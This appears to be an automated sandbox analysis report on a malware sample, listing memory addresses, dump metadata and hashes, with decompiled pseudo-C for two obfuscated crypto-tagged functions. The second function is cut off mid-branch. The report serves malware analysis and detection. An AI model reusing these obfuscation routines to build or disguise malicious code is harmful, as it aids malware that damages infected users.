                                          0x006c25aa
                                          0x006c25af
                                          0x006c25b2
                                          0x00000000
                                          0x006c2538
                                          0x006c253e
                                          0x00000000
                                          0x006c2544
                                          0x006c2567
                                          0x006c256d
                                          0x006c256d
                                          0x006c2573
                                          0x006c2578
                                          0x006c257d
                                          0x006c282d
                                          0x006c2583
                                          0x006c2583
                                          0x00000000
                                          0x006c2583
                                          0x006c257d
                                          0x006c253e
                                          0x006c2536
                                          0x006c252a
                                          0x006c2522
                                          0x006c2516
                                          0x006c2721
                                          0x006c272d
                                          0x006c272d
                                          0x006c26d9
                                          0x006c27fb
                                          0x006c2802
                                          0x006c2807
                                          0x006c280c
                                          0x006c2818
                                          0x00000000
                                          0x006c280e
                                          0x006c280e
                                          0x00000000
                                          0x006c280e
                                          0x006c26df
                                          0x006c26e5
                                          0x006c2796
                                          0x006c279b
                                          0x006c279c
                                          0x006c27a0
                                          0x006c27a5
                                          0x006c27a8
                                          0x00000000
                                          0x006c26eb
                                          0x006c26f1
                                          0x006c2744
                                          0x006c275b
                                          0x006c2761
                                          0x006c2764
                                          0x006c2769
                                          0x006c2770
                                          0x006c2778
                                          0x00000000
                                          0x006c26f3
                                          0x006c26f9
                                          0x00000000
                                          0x006c26ff
                                          0x006c271a
                                          0x006c2720
                                          0x006c26f9
                                          0x006c26f1
                                          0x006c26e5
                                          0x00000000
                                          0x006c281a
                                          0x006c281a
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$jT#$t<$0$@$uG$
                                          • API String ID: 0-3043381779
                                          • Opcode ID: 13ccf43e6d17586f164136a3a75e56a3f80daf37307104dba3b86866f3a814e6
                                          • Instruction ID: 5991ddf3aa7c3794dd7a9e0ca9a5de631368e86863a6bfffa4d5a8925b938e9c
                                          • Opcode Fuzzy Hash: 13ccf43e6d17586f164136a3a75e56a3f80daf37307104dba3b86866f3a814e6
                                          • Instruction Fuzzy Hash: 764223715093819FE378CF25C98AB9BBBE2FB84314F10891DE599962A0D7B58849CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D511B, Relevance: 17.9, Strings: 14, Instructions: 390COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				unsigned int _v308;
				signed int _v312;
				signed int _v316;
				signed int _t462;
				intOrPtr* _t466;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr _t521;
				void* _t522;
				void* _t525;
				void* _t528;
				intOrPtr* _t531;
				signed int* _t532;

				_t466 = __ecx;
				_t532 =  &_v316;
				_v140 = __edx;
				_v144 = __ecx;
				_v132 = _v132 & 0x00000000;
				_v136 = 0x75b778;
				_v308 = 0x9968;
				_v308 = _v308 | 0x0cfdc455;
				_v308 = _v308 + 0xdd4c;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x019fad6f;
				_v172 = 0xa03a;
				_v172 = _v172 >> 8;
				_v172 = _v172 ^ 0x00000391;
				_v228 = 0x2930;
				_v228 = _v228 << 0xc;
				_v228 = _v228 ^ 0x02930f5f;
				_v220 = 0x5883;
				_v220 = _v220 + 0xffff1c36;
				_v220 = _v220 ^ 0xffff6a37;
				_v288 = 0x122f;
				_v288 = _v288 << 0xf;
				_v288 = _v288 + 0xd44b;
				_v288 = _v288 << 0xa;
				_v288 = _v288 ^ 0x6151757c;
				_v260 = 0xc525;
				_v260 = _v260 << 0xa;
				_t522 = 0x1b8692db;
				_t513 = 0x61;
				_v260 = _v260 / _t513;
				_v260 = _v260 ^ 0x00083ddd;
				_v164 = 0x49a7;
				_t514 = 0x7b;
				_t462 = 0x17;
				_v164 = _v164 * 0x76;
				_v164 = _v164 ^ 0x002193f4;
				_v300 = 0x59a2;
				_v300 = _v300 ^ 0x3b27ac73;
				_v300 = _v300 + 0xffff6ec5;
				_v300 = _v300 + 0xffffb5fd;
				_v300 = _v300 ^ 0x3b271e50;
				_v252 = 0xb9af;
				_v252 = _v252 >> 8;
				_v252 = _v252 + 0xffffa108;
				_v252 = _v252 ^ 0xfffffedf;
				_v196 = 0x7b72;
				_v196 = _v196 << 2;
				_v196 = _v196 ^ 0x0001e8b2;
				_v272 = 0x250d;
				_v272 = _v272 * 0x16;
				_v272 = _v272 >> 3;
				_v272 = _v272 / _t514;
				_v272 = _v272 ^ 0x0000021c;
				_v156 = 0x4ea8;
				_v156 = _v156 + 0xffff8c10;
				_v156 = _v156 ^ 0xffffc687;
				_v292 = 0x9a7d;
				_v292 = _v292 << 1;
				_v292 = _v292 / _t462;
				_v292 = _v292 | 0x2e5edf0a;
				_v292 = _v292 ^ 0x2e5e89f7;
				_v236 = 0x69d3;
				_t515 = 0x5a;
				_v236 = _v236 / _t515;
				_v236 = _v236 >> 0xf;
				_v236 = _v236 ^ 0x000046bd;
				_v268 = 0x8cb9;
				_v268 = _v268 + 0xffff2c59;
				_v268 = _v268 << 4;
				_v268 = _v268 << 2;
				_v268 = _v268 ^ 0xffee6fc7;
				_v284 = 0x8a1;
				_v284 = _v284 ^ 0x358a3729;
				_v284 = _v284 << 4;
				_v284 = _v284 + 0xde3b;
				_v284 = _v284 ^ 0x58a4aa69;
				_v264 = 0x360c;
				_v264 = _v264 ^ 0xc2d2005c;
				_v264 = _v264 << 6;
				_t516 = 0x32;
				_v264 = _v264 * 0x5c;
				_v264 = _v264 ^ 0xe2e17670;
				_v180 = 0x8be;
				_v180 = _v180 | 0xafaf70c7;
				_v180 = _v180 ^ 0xafaf5d0a;
				_v168 = 0x59fe;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0x0b3f82ad;
				_v188 = 0x197e;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x0001c80c;
				_v256 = 0x542a;
				_v256 = _v256 + 0x92cc;
				_v256 = _v256 | 0xa238a407;
				_v256 = _v256 ^ 0xa2389846;
				_v224 = 0x7627;
				_v224 = _v224 + 0xdff4;
				_v224 = _v224 ^ 0x000122df;
				_v316 = 0x3ece;
				_v316 = _v316 * 0x74;
				_v316 = _v316 >> 8;
				_v316 = _v316 | 0xc6a89cdb;
				_v316 = _v316 ^ 0xc6a8f635;
				_v244 = 0x10d9;
				_v244 = _v244 | 0xf517e732;
				_v244 = _v244 + 0x5e6f;
				_v244 = _v244 ^ 0xf518070f;
				_v160 = 0xb68b;
				_v160 = _v160 >> 7;
				_v160 = _v160 ^ 0x00003a74;
				_v276 = 0x3579;
				_v276 = _v276 | 0x431a7672;
				_v276 = _v276 << 2;
				_v276 = _v276 / _t516;
				_v276 = _v276 ^ 0x003ff326;
				_v216 = 0xcfb7;
				_t517 = 0x63;
				_v216 = _v216 / _t517;
				_v216 = _v216 ^ 0x00003917;
				_v312 = 0xd3b7;
				_v312 = _v312 ^ 0x43b1e200;
				_v312 = _v312 << 8;
				_t518 = 0x70;
				_v312 = _v312 / _t518;
				_v312 = _v312 ^ 0x01952af0;
				_v248 = 0xe683;
				_v248 = _v248 | 0xeb182d0f;
				_v248 = _v248 + 0xcf0c;
				_v248 = _v248 ^ 0xeb19e4ec;
				_v204 = 0xada2;
				_v204 = _v204 >> 0x10;
				_v204 = _v204 ^ 0x000009df;
				_v152 = 0xb32a;
				_v152 = _v152 + 0xffff4f9d;
				_v152 = _v152 ^ 0x00004085;
				_v212 = 0xbe4c;
				_t531 = _a4;
				_v212 = _v212 * 5;
				_v212 = _v212 ^ 0x00039e07;
				_v280 = 0xc7f7;
				_v280 = _v280 | 0xad7c9e6f;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xde3ec68b;
				_v280 = _v280 ^ 0xffbea491;
				_v240 = 0x8de7;
				_v240 = _v240 * 0x45;
				_t463 = _v140;
				_v240 = _v240 / _t462;
				_v240 = _v240 ^ 0x00019f2b;
				_v304 = 0x16f;
				_v304 = _v304 | 0xdf403998;
				_v304 = _v304 ^ 0x6a41af55;
				_v304 = _v304 | 0x5f7c1de9;
				_v304 = _v304 ^ 0xff7dd65d;
				_v208 = 0xa25a;
				_v208 = _v208 / _t518;
				_v208 = _v208 ^ 0x00007fd0;
				_v184 = 0x444f;
				_t519 = 0x26;
				_v184 = _v184 * 0x7d;
				_v184 = _v184 ^ 0x002171af;
				_v192 = 0x6191;
				_v192 = _v192 << 6;
				_v192 = _v192 ^ 0x00185c0b;
				_v200 = 0x9864;
				_v200 = _v200 / _t519;
				_v200 = _v200 ^ 0x0000693d;
				_v232 = 0xae1;
				_v232 = _v232 ^ 0x7986b26b;
				_t520 = 0x49;
				_t521 = _v140;
				_v232 = _v232 / _t520;
				_v232 = _v232 ^ 0x01aa59fa;
				_v176 = 0xf7eb;
				_v176 = _v176 * 0x67;
				_v176 = _v176 ^ 0x0063e620;
				_v296 = 0x2b09;
				_v296 = _v296 + 0xffffdaa4;
				_v296 = _v296 | 0x1659e70b;
				_v296 = _v296 ^ 0x3abae7e6;
				_v296 = _v296 ^ 0x2ce32170;
				while(_t522 != 0xa551406) {
					if(_t522 == 0x10f51287) {
						E006D2674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
						_t466 = _v144;
						_t532 =  &(_t532[5]);
						_t522 = 0x3013e9c6;
						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
						continue;
					}
					if(_t522 == 0x14284095) {
						_t522 = 0x28f75045;
						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
						continue;
					}
					if(_t522 == 0x1b8692db) {
						_v148 = E006D8C8F(_t466);
						_t522 = 0x14284095;
						L10:
						_t466 = _v144;
						continue;
					}
					if(_t522 == 0x28f75045) {
						_push(_t466);
						_push(_t466);
						_t521 = E006C8736(_a4);
						 *_t531 = _t521;
						__eflags = _t521;
						if(_t521 == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t522 = 0xa551406;
						_t463 = _a4 + _t521;
						__eflags = _a4 + _t521;
						goto L10;
					}
					_t541 = _t522 - 0x3013e9c6;
					if(_t522 != 0x3013e9c6) {
						L15:
						__eflags = _t522 - 0x28249ddd;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(0x6dc7a0);
					_push(_v208);
					E006C7F4B(_t521, E006D878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
					E006D2025(_v232, _t457, _v176, _v296);
					return 1;
				}
				_t525 = (E006CEDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
				E006CB605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
				_t373 =  &_v292; // 0xe2e17670
				 *((char*)(_t532 + _t525 + 0x130)) = 0;
				_t528 = (E006CEDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
				E006CB605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
				_push(0x6dc710);
				_push(_v188);
				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
				_t521 = _t521 + E006C11C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E006D878F(_v180, _v168, __eflags), _v276);
				__eflags = _t521;
				E006D2025(_v216, _t440, _v312, _v248);
				_t466 = _v144;
				_t532 =  &(_t532[0x1c]);
				_t522 = 0x10f51287;
				goto L15;
			}




































































                                          0x006d511b
                                          0x006d511b
                                          0x006d5125
                                          0x006d512c
                                          0x006d5133
                                          0x006d513b
                                          0x006d5146
                                          0x006d514e
                                          0x006d5156
                                          0x006d515e
                                          0x006d5163
                                          0x006d516b
                                          0x006d5176
                                          0x006d517e
                                          0x006d5189
                                          0x006d5191
                                          0x006d5196
                                          0x006d519e
                                          0x006d51a6
                                          0x006d51ae
                                          0x006d51b6
                                          0x006d51be
                                          0x006d51c3
                                          0x006d51cb
                                          0x006d51d0
                                          0x006d51d8
                                          0x006d51e0
                                          0x006d51e9
                                          0x006d51f2
                                          0x006d51f7
                                          0x006d51fd
                                          0x006d5205
                                          0x006d5218
                                          0x006d521b
                                          0x006d521e
                                          0x006d5225
                                          0x006d5230
                                          0x006d5238
                                          0x006d5240
                                          0x006d5248
                                          0x006d5250
                                          0x006d5258
                                          0x006d5260
                                          0x006d5265
                                          0x006d526d
                                          0x006d5275
                                          0x006d5280
                                          0x006d5288
                                          0x006d5293
                                          0x006d52a0
                                          0x006d52a4
                                          0x006d52b1
                                          0x006d52b5
                                          0x006d52bd
                                          0x006d52c8
                                          0x006d52d3
                                          0x006d52de
                                          0x006d52e6
                                          0x006d52f0
                                          0x006d52f4
                                          0x006d52fc
                                          0x006d5306
                                          0x006d5312
                                          0x006d5317
                                          0x006d531d
                                          0x006d5322
                                          0x006d532a
                                          0x006d5332
                                          0x006d533a
                                          0x006d533f
                                          0x006d5344
                                          0x006d534c
                                          0x006d5354
                                          0x006d535c
                                          0x006d5361
                                          0x006d5369
                                          0x006d5371
                                          0x006d5379
                                          0x006d5381
                                          0x006d538b
                                          0x006d538e
                                          0x006d5392
                                          0x006d539a
                                          0x006d53a5
                                          0x006d53b0
                                          0x006d53bb
                                          0x006d53c6
                                          0x006d53ce
                                          0x006d53d9
                                          0x006d53e4
                                          0x006d53ec
                                          0x006d53f7
                                          0x006d53ff
                                          0x006d5407
                                          0x006d540f
                                          0x006d5417
                                          0x006d541f
                                          0x006d5427
                                          0x006d542f
                                          0x006d543c
                                          0x006d5440
                                          0x006d5445
                                          0x006d544d
                                          0x006d5455
                                          0x006d545d
                                          0x006d5465
                                          0x006d546d
                                          0x006d5475
                                          0x006d5480
                                          0x006d5488
                                          0x006d5493
                                          0x006d549b
                                          0x006d54a3
                                          0x006d54b0
                                          0x006d54b4
                                          0x006d54bc
                                          0x006d54c8
                                          0x006d54cd
                                          0x006d54d3
                                          0x006d54db
                                          0x006d54e3
                                          0x006d54eb
                                          0x006d54f4
                                          0x006d54f7
                                          0x006d54fb
                                          0x006d5503
                                          0x006d550b
                                          0x006d5513
                                          0x006d551b
                                          0x006d5525
                                          0x006d5530
                                          0x006d5538
                                          0x006d5543
                                          0x006d554e
                                          0x006d5559
                                          0x006d5564
                                          0x006d5573
                                          0x006d557a
                                          0x006d557e
                                          0x006d5586
                                          0x006d558e
                                          0x006d559b
                                          0x006d559f
                                          0x006d55a7
                                          0x006d55af
                                          0x006d55bc
                                          0x006d55c8
                                          0x006d55cf
                                          0x006d55d3
                                          0x006d55db
                                          0x006d55e3
                                          0x006d55eb
                                          0x006d55f3
                                          0x006d55fb
                                          0x006d5603
                                          0x006d5619
                                          0x006d5620
                                          0x006d562b
                                          0x006d563e
                                          0x006d5641
                                          0x006d5648
                                          0x006d5653
                                          0x006d565e
                                          0x006d5666
                                          0x006d5671
                                          0x006d5687
                                          0x006d568e
                                          0x006d5699
                                          0x006d56a1
                                          0x006d56ad
                                          0x006d56b0
                                          0x006d56b7
                                          0x006d56bb
                                          0x006d56c3
                                          0x006d56d6
                                          0x006d56dd
                                          0x006d56e8
                                          0x006d56f0
                                          0x006d56f8
                                          0x006d5700
                                          0x006d5708
                                          0x006d5710
                                          0x006d5722
                                          0x006d5848
                                          0x006d584d
                                          0x006d5854
                                          0x006d5857
                                          0x006d585c
                                          0x00000000
                                          0x006d585c
                                          0x006d572e
                                          0x006d5817
                                          0x006d5821
                                          0x00000000
                                          0x006d5821
                                          0x006d573a
                                          0x006d5806
                                          0x006d580d
                                          0x006d57ea
                                          0x006d57ea
                                          0x00000000
                                          0x006d57ea
                                          0x006d5746
                                          0x006d57c7
                                          0x006d57c8
                                          0x006d57d1
                                          0x006d57d3
                                          0x006d57d8
                                          0x006d57da
                                          0x006d5998
                                          0x006d5998
                                          0x00000000
                                          0x006d5998
                                          0x006d57e3
                                          0x006d57e8
                                          0x006d57e8
                                          0x00000000
                                          0x006d57e8
                                          0x006d5748
                                          0x006d574e
                                          0x006d598c
                                          0x006d598c
                                          0x006d5992
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x006d5992
                                          0x006d5754
                                          0x006d5759
                                          0x006d5792
                                          0x006d57ab
                                          0x00000000
                                          0x006d57b5
                                          0x006d58a2
                                          0x006d58a7
                                          0x006d58b0
                                          0x006d58c3
                                          0x006d58ef
                                          0x006d58f4
                                          0x006d58f9
                                          0x006d58fe
                                          0x006d5913
                                          0x006d596b
                                          0x006d596b
                                          0x006d5978
                                          0x006d597d
                                          0x006d5984
                                          0x006d5987
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
                                          • API String ID: 0-2620103065
                                          • Opcode ID: 0ee8927850cc808b42524e48752f73e40c4e79944385f14c25b9fd2d76d3574d
                                          • Instruction ID: ccd1d4e970c0f5638877c6b3d7cdae929ad95f5652e6574f30b83ad1a6d31058
                                          • Opcode Fuzzy Hash: 0ee8927850cc808b42524e48752f73e40c4e79944385f14c25b9fd2d76d3574d
                                          • Instruction Fuzzy Hash: 57222371508380DFE364CF25C58AA8BFBE2BBC4748F108A1DE5D996261C7B58949CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C4A35, Relevance: 16.7, Strings: 13, Instructions: 468COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E006C4A35(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t474;
				void* _t475;
				signed int _t479;
				signed int _t491;
				signed int _t496;
				signed int _t500;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t520;
				signed int _t524;
				void* _t530;
				void* _t532;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				void* _t579;
				void* _t580;
				void* _t582;

				_v1628 = 0xed3;
				_v1628 = _v1628 + 0xd002;
				_v1628 = _v1628 ^ 0x0000defc;
				_v1796 = 0x50e8;
				_v1796 = _v1796 + 0xffffea13;
				_v1796 = _v1796 >> 0xe;
				_v1796 = _v1796 ^ 0x3dc2eaa9;
				_v1796 = _v1796 ^ 0x3dc2b05a;
				_v1604 = 0xecd0;
				_v1604 = _v1604 << 0xd;
				_v1604 = _v1604 ^ 0x1d9a54ec;
				_v1636 = 0xad8d;
				_v1636 = _v1636 >> 0xc;
				_v1636 = _v1636 ^ 0x000019e2;
				_v1600 = 0x1846;
				_v1592 = __edx;
				_t574 = 0x4762904;
				_v1588 = __ecx;
				_t510 = 0x63;
				_v1600 = _v1600 / _t510;
				_v1600 = _v1600 ^ 0x00006484;
				_v1740 = 0xfd34;
				_v1740 = _v1740 ^ 0x1b9865fd;
				_v1740 = _v1740 ^ 0xced01448;
				_v1740 = _v1740 ^ 0xd548e885;
				_v1684 = 0x582a;
				_t572 = 0x3b;
				_v1684 = _v1684 / _t572;
				_v1684 = _v1684 ^ 0x000016a0;
				_v1724 = 0x2b60;
				_t511 = 0x34;
				_v1724 = _v1724 / _t511;
				_v1724 = _v1724 ^ 0xf4396e09;
				_v1724 = _v1724 ^ 0xf4397db5;
				_v1732 = 0x220f;
				_v1732 = _v1732 ^ 0x234d952a;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 ^ 0x11a6b27c;
				_v1616 = 0x4d57;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x026acda8;
				_v1672 = 0x3d68;
				_v1672 = _v1672 + 0xffff611f;
				_v1672 = _v1672 ^ 0xffff811c;
				_v1800 = 0xf339;
				_v1800 = _v1800 + 0xfffff0f7;
				_v1800 = _v1800 + 0x895c;
				_v1800 = _v1800 + 0xc572;
				_v1800 = _v1800 ^ 0x000271c2;
				_v1664 = 0x37c5;
				_v1664 = _v1664 + 0xffffa7ba;
				_v1664 = _v1664 ^ 0xffffa1b5;
				_v1632 = 0xc51c;
				_v1632 = _v1632 >> 4;
				_v1632 = _v1632 ^ 0x00001093;
				_v1640 = 0x76f9;
				_v1640 = _v1640 ^ 0x9fffdcc0;
				_v1640 = _v1640 ^ 0x9fff82e4;
				_v1648 = 0x8076;
				_v1648 = _v1648 * 7;
				_v1648 = _v1648 ^ 0x0003a5e4;
				_v1708 = 0x21bc;
				_v1708 = _v1708 + 0xc05f;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 ^ 0x0038a40f;
				_v1784 = 0xa89a;
				_v1784 = _v1784 / _t572;
				_v1784 = _v1784 + 0xffffeb30;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0xffb86208;
				_v1656 = 0x5b43;
				_v1656 = _v1656 ^ 0xe62d1ba2;
				_v1656 = _v1656 ^ 0xe62d5436;
				_v1792 = 0x5d3e;
				_v1792 = _v1792 >> 5;
				_v1792 = _v1792 + 0xfffff433;
				_v1792 = _v1792 ^ 0x1afa5a2f;
				_v1792 = _v1792 ^ 0xe50594ef;
				_v1680 = 0x9f3f;
				_v1680 = _v1680 + 0xfffff3b1;
				_v1680 = _v1680 ^ 0x0000dcc5;
				_v1780 = 0x8a4e;
				_v1780 = _v1780 >> 0xc;
				_v1780 = _v1780 + 0x10e4;
				_v1780 = _v1780 ^ 0x817594c9;
				_v1780 = _v1780 ^ 0x81758ecd;
				_v1748 = 0xbeb1;
				_v1748 = _v1748 | 0x408b0c07;
				_v1748 = _v1748 + 0xffff7379;
				_v1748 = _v1748 ^ 0x408b5cad;
				_v1752 = 0xb76f;
				_v1752 = _v1752 >> 0xe;
				_t512 = 0x23;
				_v1752 = _v1752 / _t512;
				_v1752 = _v1752 ^ 0x000011f4;
				_v1652 = 0x783b;
				_v1652 = _v1652 ^ 0xf6ea495a;
				_v1652 = _v1652 ^ 0xf6ea4537;
				_v1788 = 0x701e;
				_v1788 = _v1788 | 0x54ae9efd;
				_v1788 = _v1788 >> 0xa;
				_v1788 = _v1788 + 0x818c;
				_v1788 = _v1788 ^ 0x0015b45a;
				_v1756 = 0xfc95;
				_t513 = 0x4e;
				_v1756 = _v1756 / _t513;
				_v1756 = _v1756 | 0x6e3e6587;
				_v1756 = _v1756 ^ 0x6e3e48c8;
				_v1720 = 0xc52f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 << 2;
				_v1720 = _v1720 ^ 0x00007c98;
				_v1620 = 0xf570;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 ^ 0x00006ca8;
				_v1712 = 0x65f6;
				_v1712 = _v1712 | 0x8fa1cc9c;
				_v1712 = _v1712 >> 9;
				_v1712 = _v1712 ^ 0x0047fc5c;
				_v1676 = 0xb942;
				_v1676 = _v1676 * 0x15;
				_v1676 = _v1676 ^ 0x000f4c8d;
				_v1736 = 0x950a;
				_v1736 = _v1736 | 0x9f71954d;
				_v1736 = _v1736 + 0xffff5dd1;
				_v1736 = _v1736 ^ 0x9f70c3f6;
				_v1704 = 0xd0f3;
				_v1704 = _v1704 + 0xffff53c3;
				_v1704 = _v1704 ^ 0xce9fbdc0;
				_v1704 = _v1704 ^ 0xce9f87f0;
				_v1596 = 0x1518;
				_v1596 = _v1596 + 0x85a2;
				_v1596 = _v1596 ^ 0x000083d8;
				_v1668 = 0x64f;
				_v1668 = _v1668 + 0xffff0b06;
				_v1668 = _v1668 ^ 0xffff3669;
				_v1728 = 0x3b1d;
				_v1728 = _v1728 + 0x874c;
				_v1728 = _v1728 | 0x620470b3;
				_v1728 = _v1728 ^ 0x6204e551;
				_v1696 = 0x2df9;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 ^ 0x016fb4ca;
				_v1764 = 0xcc6;
				_v1764 = _v1764 | 0x8d34f989;
				_t514 = 0x74;
				_v1764 = _v1764 / _t514;
				_t515 = 0x18;
				_v1764 = _v1764 * 0x6c;
				_v1764 = _v1764 ^ 0x8377a340;
				_v1608 = 0x20b8;
				_v1608 = _v1608 + 0xffffe23d;
				_v1608 = _v1608 ^ 0x000040ba;
				_v1660 = 0xbd08;
				_v1660 = _v1660 | 0x92c929d6;
				_v1660 = _v1660 ^ 0x92c9e2c3;
				_v1644 = 0x1738;
				_v1644 = _v1644 + 0x2a2d;
				_v1644 = _v1644 ^ 0x00007d9b;
				_v1772 = 0x814c;
				_v1772 = _v1772 * 0x2f;
				_v1772 = _v1772 ^ 0x2fd35c8b;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 ^ 0x89c0ce59;
				_v1612 = 0xaccd;
				_v1612 = _v1612 << 0xb;
				_v1612 = _v1612 ^ 0x05662888;
				_v1624 = 0x6919;
				_v1624 = _v1624 >> 0xb;
				_v1624 = _v1624 ^ 0x00005c9e;
				_v1768 = 0x2455;
				_v1768 = _v1768 ^ 0xee213c0c;
				_v1768 = _v1768 + 0xffffdbe3;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x03b8b908;
				_v1776 = 0x634b;
				_v1776 = _v1776 << 3;
				_v1776 = _v1776 * 0x44;
				_v1776 = _v1776 + 0xffff5e24;
				_v1776 = _v1776 ^ 0x00d21830;
				_v1688 = 0xdff8;
				_v1688 = _v1688 ^ 0x1c92e1a2;
				_v1688 = _v1688 ^ 0x1c9257de;
				_v1744 = 0xd5b6;
				_v1744 = _v1744 << 7;
				_v1744 = _v1744 ^ 0x97cdeac8;
				_v1744 = _v1744 ^ 0x97a72039;
				_v1692 = 0x89ed;
				_v1692 = _v1692 + 0xffff6a89;
				_v1692 = _v1692 | 0xb25fce0e;
				_v1692 = _v1692 ^ 0xfffff10e;
				_v1700 = 0xa1e5;
				_v1700 = _v1700 * 0x2a;
				_v1700 = _v1700 + 0xffff21dd;
				_v1700 = _v1700 ^ 0x00199ee5;
				_v1760 = 0x2165;
				_v1760 = _v1760 + 0xb9ba;
				_v1760 = _v1760 / _t515;
				_v1760 = _v1760 * 0x41;
				_v1760 = _v1760 ^ 0x000227fb;
				_v1716 = 0x5b5d;
				_v1716 = _v1716 | 0x7b7605fc;
				_v1716 = _v1716 >> 5;
				_v1716 = _v1716 ^ 0x03cbb2ff;
				_t474 = E006D6D44(_t515);
				_t573 = _v1592;
				_t579 = _t474;
				_t508 = _v1592;
				while(1) {
					L1:
					_t475 = 0x1359b45f;
					do {
						while(1) {
							L2:
							_t582 = _t574 - 0x1dbe7493;
							if(_t582 > 0) {
								break;
							}
							if(_t582 == 0) {
								return E006CF536(_v1692, _v1700, _v1760, _t573);
							}
							if(_t574 != 0x4762904) {
								if(_t574 == 0x589c6e4) {
									E006CF536(_v1644, _v1772, _v1612, _t508);
									_pop(_t524);
									_t574 = 0x1e3f4be6;
									while(1) {
										L1:
										_t475 = 0x1359b45f;
										goto L2;
									}
								} else {
									if(_t574 == 0xb2e7f16) {
										_t524 = _v1748;
										_t500 = E006D1773(_v1752, _v1584, _v1580, _v1652, _v1788);
										_t508 = _t500;
										_t580 = _t580 + 0x10;
										__eflags = _t500;
										_t475 = 0x1359b45f;
										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
										continue;
									} else {
										if(_t574 == 0xbe4541e) {
